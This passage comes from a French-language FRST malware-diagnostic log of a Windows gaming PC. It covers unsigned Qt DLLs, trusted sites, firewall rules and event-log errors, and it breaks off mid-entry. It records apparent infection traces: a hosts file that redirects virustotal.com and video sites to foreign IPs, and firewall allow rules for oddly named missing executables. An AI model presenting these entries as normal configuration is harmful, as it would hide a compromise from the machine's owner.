C:\Program Files (x86)\Origin\Qt5WebSockets.dll 2019-06-01 12:06 - 2019-05-25 09:56 - 005089792 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Widgets.dll 2019-06-01 12:06 - 2019-05-25 09:56 - 000184832 _____ (The Qt Company Ltd) [Fichier non signé] C:\Program Files (x86)\Origin\Qt5Xml.dll 2017-09-14 08:37 - 2017-09-14 08:37 - 000026112 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qgif.dll 2017-09-14 08:42 - 2017-09-14 08:42 - 000033280 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qicns.dll 2017-09-14 08:37 - 2017-09-14 08:37 - 000027648 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qico.dll 2017-09-14 08:37 - 2017-09-14 08:37 - 000245760 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qjpeg.dll 2017-09-14 08:42 - 2017-09-14 08:42 - 000021504 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qsvg.dll 2017-09-14 08:42 - 2017-09-14 08:42 - 000020992 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qtga.dll 2017-09-14 08:42 - 2017-09-14 08:42 - 000316416 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qtiff.dll 2017-09-14 08:42 - 2017-09-14 08:42 - 000019968 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qwbmp.dll 2017-09-14 08:42 - 2017-09-14 08:42 - 000322560 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qwebp.dll 2017-09-14 08:37 - 2017-09-14 08:37 - 001010688 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\platforms\qwindows.dll 2019-05-25 20:52 - 2019-05-25 20:52 - 000047104 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\audio\qtaudio_windows.dll 2019-05-25 20:52 - 2019-05-25 20:52 - 000026112 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\imageformats\qgif.dll 2019-05-25 20:52 - 2019-05-25 20:52 - 000027136 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\imageformats\qico.dll 2019-05-25 20:52 - 2019-05-25 20:52 - 000243712 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\imageformats\qjpeg.dll 2019-05-25 20:52 - 2019-05-25 20:52 - 000223744 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\imageformats\qmng.dll 2019-05-25 20:52 - 2019-05-25 20:52 - 000020992 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\imageformats\qsvg.dll 2019-05-25 20:52 - 2019-05-25 20:52 - 000332288 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\imageformats\qtiff.dll 2019-05-25 20:52 - 2019-05-25 20:52 - 001140224 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\platforms\qwindows.dll 2019-05-25 20:52 - 2019-05-25 20:52 - 000041984 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\qml\QtGraphicalEffects\private\qtgraphicaleffectsprivate.dll 2019-05-25 20:52 - 2019-05-25 20:52 - 000014848 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\qml\QtGraphicalEffects\qtgraphicaleffectsplugin.dll 2019-05-25 20:52 - 2019-05-25 20:52 - 000014848 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\qml\QtQml\Models.2\modelsplugin.dll 2019-05-25 20:52 - 2019-05-25 20:52 - 000014848 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\qml\QtQuick.2\qtquick2plugin.dll 2019-05-25 20:52 - 2019-05-25 20:52 - 000084480 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\qml\QtQuick\Controls.2\qtquickcontrols2plugin.dll 2019-05-25 20:52 - 2019-05-25 20:52 - 000267776 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\qml\QtQuick\Controls\qtquickcontrolsplugin.dll 2019-05-25 20:52 - 2019-05-25 20:52 - 000071680 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\qml\QtQuick\Layouts\qquicklayoutsplugin.dll 2019-05-25 20:52 - 2019-05-25 20:52 - 000211456 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\qml\QtQuick\Templates.2\qtquicktemplates2plugin.dll 2019-05-25 20:52 - 2019-05-25 20:53 - 000014848 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\qml\QtQuick\Window.2\windowplugin.dll 2019-05-25 20:53 - 2019-05-25 20:53 - 004943360 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\Qt5Core.dll 2019-05-25 20:53 - 2019-05-25 20:53 - 005022208 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\Qt5Gui.dll 2019-05-25 20:53 - 2019-05-25 20:53 - 000626176 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\Qt5Multimedia.dll 2019-05-25 20:53 - 2019-05-25 20:53 - 000877056 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\Qt5Network.dll 2019-05-25 20:53 - 2019-05-25 20:53 - 002908672 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\Qt5Qml.dll 2019-05-25 20:53 - 2019-05-25 20:53 - 003078656 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\Qt5Quick.dll 2019-05-25 20:53 - 2019-05-25 20:53 - 000096256 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\Qt5QuickControls2.dll 2019-05-25 20:53 - 2019-05-25 20:53 - 000681472 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\Qt5QuickTemplates2.dll 2019-05-25 20:53 - 2019-05-25 20:53 - 000259072 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\Qt5Svg.dll 2019-05-25 20:53 - 2019-05-25 20:53 - 004718080 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\Qt5Widgets.dll 2019-05-25 20:53 - 2019-05-25 20:53 - 000439296 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\Qt5WinExtras.dll 2019-05-25 20:53 - 2019-05-25 20:53 - 000159232 _____ (The Qt Company Ltd.) [Fichier non signé] C:\Program Files (x86)\Battle.net\Battle.net.11189\Qt5Xml.dll ==================== Alternate Data Streams (Avec liste blanche) ========= (Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.) AlternateDataStreams: C:\Users\Luca:.repos [6040176] AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [480] ==================== Mode sans échec (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.) ==================== Association (Avec liste blanche) =============== (Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.) ==================== Internet Explorer sites de confiance/sensibles =============== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.) IE trusted site: HKU\.DEFAULT\...\localhost -> localhost IE trusted site: HKU\.DEFAULT\...\webcompanion.com -> hxxp://webcompanion.com IE trusted site: HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\localhost -> localhost IE trusted site: HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\webcompanion.com -> hxxp://webcompanion.com ==================== Hosts contenu: ========================== (Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.) 2018-09-15 09:31 - 2019-06-04 02:01 - 000000458 _____ C:\Windows\system32\drivers\etc\hosts 162.222.193.86 aoaomo.tremorhub.com 188.95.50.62 bobomo.tremorhub.com 162.222.193.86 www.howcast.com 162.222.193.86 howcast.com 162.222.193.86 www.ustream.tv 162.222.193.86 ustream.tv 162.222.193.86 www.livestream.com 162.222.193.86 livestream.com 162.222.193.86 www.dailymotion.com 162.222.193.86 dailymotion.com 192.192.3.8 www.virustotal.com 192.192.3.8 virustotal.com 2018-12-27 01:43 - 2018-12-27 01:44 - 000000375 _____ C:\Windows\system32\drivers\etc\hosts.ics ==================== Autres zones ============================ (Actuellement, il n'y a pas de correction automatique pour cette section.) HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\ HKU\S-1-5-21-3183337316-3821782573-710669081-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Luca\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\d7df5243cea0abf8e4484b160a0bf5ad.png DNS Servers: 192.168.1.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: ) Le Pare-feu est activé. ==================== MSCONFIG/TASK MANAGER éléments désactivés == Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé. ==================== RèglesPare-feu (Avec liste blanche) =============== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) FirewallRules: [{C4CEA4D4-E70C-40C3-8B77-44C479EC0228}] => (Allow) C:\Program Files\DriversCloud.com\DriversCloud.exe Pas de fichier FirewallRules: [{C67B3A3E-974E-43B0-913B-CEDA61111E3F}] => (Allow) C:\Program Files\DriversCloud.com\DriversCloud.exe Pas de fichier FirewallRules: [TCP Query User{E7A56644-F9BE-4B00-9FFA-C8AA1350138E}D:\jeux\gog games\star wars - battlefront 2\gamedata\battlefrontii.exe] => (Allow) D:\jeux\gog games\star wars - battlefront 2\gamedata\battlefrontii.exe Pas de fichier FirewallRules: [UDP Query User{5C2D6D4E-6A25-492B-B4D9-C0E988B87596}D:\jeux\gog games\star wars - battlefront 2\gamedata\battlefrontii.exe] => (Allow) D:\jeux\gog games\star wars - battlefront 2\gamedata\battlefrontii.exe Pas de fichier FirewallRules: [{35AA7FF1-6EC8-4B9B-862B-252C003854BE}] => (Allow) E:\Programmes\Steam\Steam.exe (Valve -> Valve Corporation) FirewallRules: [{6D5EE91C-225B-41BF-8322-4547FAFF75B4}] => (Allow) E:\Programmes\Steam\Steam.exe (Valve -> Valve Corporation) FirewallRules: [{EFD538F9-120B-49FF-8E48-B29B8D951348}] => (Allow) E:\Programmes\Steam\bin\cef\cef.win7\steamwebhelper.exe Pas de fichier FirewallRules: [{E75B2E82-02AE-49EE-A9A5-784F637EF68F}] => (Allow) E:\Programmes\Steam\bin\cef\cef.win7\steamwebhelper.exe Pas de fichier FirewallRules: [{67031B8B-8761-4A56-A50C-4BECFAB6B261}] => (Allow) E:\Programmes\Steam\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe Pas de fichier FirewallRules: [{0DAC699D-9F95-4B1F-A760-D969DB55FE23}] => (Allow) E:\Programmes\Steam\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe Pas de fichier FirewallRules: [TCP Query User{6D787ACA-9FAE-4E26-8C3A-2B4F1F1FBAEE}E:\programmes\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe] => (Allow) E:\programmes\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe Pas de fichier FirewallRules: [UDP Query User{681339B6-4D2F-4BA6-A2CE-6BBFF63A2A4C}E:\programmes\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe] => (Allow) E:\programmes\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe Pas de fichier FirewallRules: [TCP Query User{7F8014BB-0A4E-4FE2-87EF-E6C0126305EB}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.) FirewallRules: [UDP Query User{C65F0971-39F5-4CDA-BB6E-574B570A328A}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.) FirewallRules: [TCP Query User{8F6822C5-6291-48B8-91C3-95B88BB99EB3}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe (Epic Games Inc. -> Epic Games, Inc.) FirewallRules: [UDP Query User{A688A63B-A5DB-4CE9-AF24-791ABF016E11}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe (Epic Games Inc. -> Epic Games, Inc.) FirewallRules: [TCP Query User{86A23B8D-418C-4B18-887A-34D190D5A858}C:\program files\epic games\subnautica\subnautica.exe] => (Allow) C:\program files\epic games\subnautica\subnautica.exe Pas de fichier FirewallRules: [UDP Query User{1EB99348-BBE4-4FB6-BE07-0918B69CF291}C:\program files\epic games\subnautica\subnautica.exe] => (Allow) C:\program files\epic games\subnautica\subnautica.exe Pas de fichier FirewallRules: [TCP Query User{5B672003-343F-435E-98BE-48DED4158035}C:\program files (x86)\call of duty black ops 4\blackops4.exe] => (Allow) C:\program files (x86)\call of duty black ops 4\blackops4.exe Pas de fichier FirewallRules: [UDP Query User{B477D79A-DBFE-4B9A-8C99-050360155387}C:\program files (x86)\call of duty black ops 4\blackops4.exe] => (Allow) C:\program files (x86)\call of duty black ops 4\blackops4.exe Pas de fichier FirewallRules: [TCP Query User{12667AE2-6AF7-40F5-A88F-176AA391EACD}C:\program files\epic games\subnautica\subnautica.exe] => (Allow) C:\program files\epic games\subnautica\subnautica.exe Pas de fichier FirewallRules: [UDP Query User{575511C8-FD2E-4AA2-B868-855D5476BFF2}C:\program files\epic games\subnautica\subnautica.exe] => (Allow) C:\program files\epic games\subnautica\subnautica.exe Pas de fichier FirewallRules: [TCP Query User{56A278BB-9126-4E6F-8D78-EC058244BE89}E:\programmes\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe] => (Allow) E:\programmes\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe Pas de fichier FirewallRules: [UDP Query User{FFA7B4FC-9B76-4827-A22C-B31D0F55F750}E:\programmes\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe] => (Allow) E:\programmes\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe Pas de fichier FirewallRules: [{DBB6B518-C598-48BD-B6C8-8E1FA3EFCEDA}] => (Allow) E:\Programmes\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation) FirewallRules: [{B81FD013-E746-4667-8D1B-973BCDB67C1C}] => (Allow) E:\Programmes\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation) FirewallRules: [TCP Query User{DC19BA6F-F7E6-4EFA-AE37-8A5E09050C6B}C:\program files (x86)\call of duty black ops 4\blackops4.exe] => (Allow) C:\program files (x86)\call of duty black ops 4\blackops4.exe Pas de fichier FirewallRules: [UDP Query User{1B71BB45-B1AC-4FE0-B2AA-A026D108CC9E}C:\program files (x86)\call of duty black ops 4\blackops4.exe] => (Allow) C:\program files (x86)\call of duty black ops 4\blackops4.exe Pas de fichier FirewallRules: [TCP Query User{55629635-C996-4972-B538-E8D189F7808B}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe (Epic Games Inc. -> Epic Games, Inc.) FirewallRules: [UDP Query User{86C09AC4-F7D5-4B23-A399-BF469BD48669}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe (Epic Games Inc. -> Epic Games, Inc.) FirewallRules: [TCP Query User{FB1AB133-B875-4077-B2B3-8FF49B5AD0AE}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Block) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.) FirewallRules: [UDP Query User{4FFA4234-5518-4633-862C-F28EEF9337B8}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Block) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.) FirewallRules: [TCP Query User{C27C0DB4-FC1B-4E0B-880D-C4988CEAC03B}C:\program files (x86)\origin games\apex\r5apex.exe] => (Allow) C:\program files (x86)\origin games\apex\r5apex.exe (NVIDIA GameStream Server -> Respawn Entertainment) [Fichier non signé] FirewallRules: [UDP Query User{8BF721A4-84F4-4E61-8FA0-7B807877B07A}C:\program files (x86)\origin games\apex\r5apex.exe] => (Allow) C:\program files (x86)\origin games\apex\r5apex.exe (NVIDIA GameStream Server -> Respawn Entertainment) [Fichier non signé] FirewallRules: [TCP Query User{22476E33-6B7A-4419-92A8-68ACAF31CF23}C:\program files (x86)\origin games\apex\r5apex.exe] => (Allow) C:\program files (x86)\origin games\apex\r5apex.exe (NVIDIA GameStream Server -> Respawn Entertainment) [Fichier non signé] FirewallRules: [UDP Query User{DF877D81-21B9-4CB1-8905-7002C430D745}C:\program files (x86)\origin games\apex\r5apex.exe] => (Allow) C:\program files (x86)\origin games\apex\r5apex.exe (NVIDIA GameStream Server -> Respawn Entertainment) [Fichier non signé] FirewallRules: [{BCB089B5-4E0E-41D0-8D5F-87D0F394F941}] => (Allow) C:\Program Files (x86)\theHunter\launcher\launcher.exe Pas de fichier FirewallRules: [{1ADC4F7C-FA1F-48CB-BE41-D5FB30F21B4C}] => (Allow) C:\Program Files (x86)\theHunter\launcher\launcher.exe Pas de fichier FirewallRules: [TCP Query User{90D38539-2AC8-4316-B73F-039C62A392A0}C:\program files (x86)\thehunter\game\thehunter.exe] => (Allow) C:\program files (x86)\thehunter\game\thehunter.exe Pas de fichier FirewallRules: [UDP Query User{00F416D7-78F6-42DF-A59E-86A5E143133E}C:\program files (x86)\thehunter\game\thehunter.exe] => (Allow) C:\program files (x86)\thehunter\game\thehunter.exe Pas de fichier FirewallRules: [TCP Query User{020860F0-2485-43A8-9ED6-7AAC611A4029}C:\program files (x86)\overwatch\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\overwatch.exe Pas de fichier FirewallRules: [UDP Query User{73B648D0-CD17-40F9-AAE6-6CF0DBBDD2BF}C:\program files (x86)\overwatch\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\overwatch.exe Pas de fichier FirewallRules: [TCP Query User{3617A8B4-3209-4C9F-8AA3-BA7CA6AC2973}C:\program files (x86)\overwatch\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\overwatch.exe Pas de fichier FirewallRules: [UDP Query User{65323F0D-A247-42D9-A1B0-E79B162F05A9}C:\program files (x86)\overwatch\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\overwatch.exe Pas de fichier FirewallRules: [{CBB53F6B-3F4F-43A1-8B14-41ABC000128C}] => (Allow) E:\Programmes\Steam\steamapps\common\Rust\Rust.exe (Facepunch Studios Ltd -> EasyAntiCheat Ltd) FirewallRules: [{34D5DCF2-BB16-4DF6-8EFE-31D3E19D2D9F}] => (Allow) E:\Programmes\Steam\steamapps\common\Rust\Rust.exe (Facepunch Studios Ltd -> EasyAntiCheat Ltd) FirewallRules: [{CE6BC38F-CA22-413D-AEC6-C89D8F6FAE7D}] => (Allow) E:\Programmes\Ubisoft Game Launcher\games\Far Cry New Dawn\bin\FarCryNewDawn.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft Entertainment) FirewallRules: [{E550E28E-B208-466F-BD78-AD1CCABFCD77}] => (Allow) E:\Programmes\Ubisoft Game Launcher\games\Far Cry New Dawn\bin\FarCryNewDawn.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft Entertainment) FirewallRules: [TCP Query User{B9C0DFCC-BFA0-4050-9531-5F46240D6E34}C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.) FirewallRules: [UDP Query User{69712AE2-51A0-44C4-B89C-1646B53437FC}C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.) FirewallRules: [{CF8F908A-B65A-47FB-9B99-0A866398A15D}] => (Allow) C:\Program Files (x86)\Origin Games\Apex\EasyAntiCheat_launcher.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd) FirewallRules: [{4C7B65AA-4F13-4E17-8713-3FCC22A35940}] => (Allow) C:\Program Files (x86)\Origin Games\Apex\EasyAntiCheat_launcher.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd) FirewallRules: [TCP Query User{66F740C6-28A6-4058-BE32-59FCADD943E5}E:\programmes\minecraft\runtime\jre-x64\bin\javaw.exe] => (Allow) E:\programmes\minecraft\runtime\jre-x64\bin\javaw.exe FirewallRules: [UDP Query User{898A3415-E169-4826-8DF2-066E1BC5D6C3}E:\programmes\minecraft\runtime\jre-x64\bin\javaw.exe] => (Allow) E:\programmes\minecraft\runtime\jre-x64\bin\javaw.exe FirewallRules: [TCP Query User{4CF55510-DEA4-4585-AD0E-93E9DD252581}C:\program files\java\jre1.8.0_211\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_211\bin\javaw.exe FirewallRules: [UDP Query User{37B9B4FF-34FA-4530-82BF-FE0A07C50B2F}C:\program files\java\jre1.8.0_211\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_211\bin\javaw.exe FirewallRules: [TCP Query User{B87284A4-69A5-4F69-BC01-ACD7F65E17C0}E:\programmes\minecraft\runtime\jre-x64\bin\javaw.exe] => (Allow) E:\programmes\minecraft\runtime\jre-x64\bin\javaw.exe FirewallRules: [UDP Query User{31858F16-4FC0-4EA1-A957-58CEFB33B211}E:\programmes\minecraft\runtime\jre-x64\bin\javaw.exe] => (Allow) E:\programmes\minecraft\runtime\jre-x64\bin\javaw.exe FirewallRules: [TCP Query User{97135BF8-D015-43C2-8FFD-C45775919654}C:\program files (x86)\common files\oracle\java\javapath_target_94430703\java.exe] => (Allow) C:\program files (x86)\common files\oracle\java\javapath_target_94430703\java.exe FirewallRules: [UDP Query User{2471A425-C42B-4D30-8859-C6BA07333646}C:\program files (x86)\common files\oracle\java\javapath_target_94430703\java.exe] => (Allow) C:\program files (x86)\common files\oracle\java\javapath_target_94430703\java.exe FirewallRules: [{22CF977F-189A-4737-9BD7-EA5B1197A030}] => (Allow) LPort=25565 FirewallRules: [TCP Query User{1A9862BD-029E-491D-89C7-0A50B42E95DB}C:\program files (x86)\common files\oracle\java\javapath_target_94430703\java.exe] => (Allow) C:\program files (x86)\common files\oracle\java\javapath_target_94430703\java.exe FirewallRules: [UDP Query User{3579A541-D31A-4F67-B593-0FEA5E359D40}C:\program files (x86)\common files\oracle\java\javapath_target_94430703\java.exe] => (Allow) C:\program files (x86)\common files\oracle\java\javapath_target_94430703\java.exe FirewallRules: [{3DA9B534-2530-4983-8217-CC5196CC7AA6}] => (Allow) E:\Programmes\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe (Valve -> ) FirewallRules: [{C15E1FA4-3978-41C5-9DAE-3DF9C9839F28}] => (Allow) E:\Programmes\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe (Valve -> ) FirewallRules: [{450F456A-E430-49B9-B908-7C1C97C28236}] => (Allow) C:\Windows\system32\rundll32.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{2EC9F487-1DCC-490C-A487-F20E81496931}] => (Allow) C:\Program Files (x86)\Primary\Velde.exe Pas de fichier FirewallRules: [{F0683852-B532-49BA-9EF3-AB7D501B755C}] => (Allow) C:\Program Files (x86)\Otherwise\Sixth.exe Pas de fichier FirewallRules: [{F13038C6-837D-4D32-B087-2FC59EB9A3E7}] => (Allow) C:\Windows\SysWOW64\TCPSVCS.EXE (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{A894EA88-5A13-4BC4-86DE-3D7DD87FE105}] => (Allow) C:\Windows\system32\rundll32.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [TCP Query User{BB989E8A-243D-4344-8630-3BD9DE15F90E}C:\windows\syswow64\svchost.exe] => (Allow) C:\windows\syswow64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [UDP Query User{76EE825A-9037-4EDB-948A-4E8D65A59030}C:\windows\syswow64\svchost.exe] => (Allow) C:\windows\syswow64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{1B45E94C-9189-4E07-B82C-B3C152A112D6}] => (Allow) C:\Windows\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{49089F59-0077-4D4E-B8CE-E1E848ABAA3E}] => (Allow) C:\Windows\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{A3057545-81EC-4A53-B8DD-A1856FF90A50}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google Inc.) FirewallRules: [{E0EF78D4-FD5E-446C-AD43-7D762D537C68}] => (Allow) C:\Program Files (x86)\Origin Games\Apex\EasyAntiCheat_launcher.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd) FirewallRules: [{A57B14B8-BFC1-411E-803D-B5F3513CDFCB}] => (Allow) C:\Program Files (x86)\Origin Games\Apex\EasyAntiCheat_launcher.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd) FirewallRules: [{16677F5E-12B7-413B-B742-9A695E7602AA}] => (Allow) E:\Programmes\Steam\steamapps\common\rocketleague\Binaries\Win32\RocketLeague.exe (Psyonix, Inc) [Fichier non signé] FirewallRules: [{7788B0C5-1E7D-49BE-ACC1-370D1213859C}] => (Allow) E:\Programmes\Steam\steamapps\common\rocketleague\Binaries\Win32\RocketLeague.exe (Psyonix, Inc) [Fichier non signé] ==================== Points de restauration ========================= 02-06-2019 16:26:01 DirectX est installé 04-06-2019 02:24:43 Removed DriversCloud.com (64 bits) 05-06-2019 13:23:21 DirectX est installé ==================== Éléments en erreur du Gestionnaire de périphériques ============= ==================== Erreurs du Journal des événements: ========================= Erreurs Application: ================== Error: (06/04/2019 07:33:48 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Le programme ShellExperienceHost.exe version 10.0.17763.439 a cessé d'interagir avec Windows et a été fermé. Pour voir si plus d'informations sur le problème sont disponibles, vérifiez l'historique des problèmes dans le Panneau de configuration Sécurité et maintenance. ID de processus : df8 Heure de début : 01d51af3da608f31 Heure d'arrêt : 4294967295 Chemin d'accès à l'application : C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe ID de rapport : 885f3f53-8406-466e-8466-7343da7f413a Nom complet du package défectueux : Microsoft.Windows.ShellExperienceHost_10.0.17763.1_neutral_neutral_cw5n1h2txyewy ID de l'application relative à un package défectueux : App Type de blocage : Quiesce Error: (06/04/2019 07:11:39 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Le programme csgo.exe version 0.0.0.0 a cessé d'interagir avec Windows et a été fermé. Pour voir si plus d'informations sur le problème sont disponibles, vérifiez l'historique des problèmes dans le Panneau de configuration Sécurité et maintenance. ID de processus : 2988 Heure de début : 01d51af83b03ee7e Heure d'arrêt : 644 Chemin d'accès à l'application : 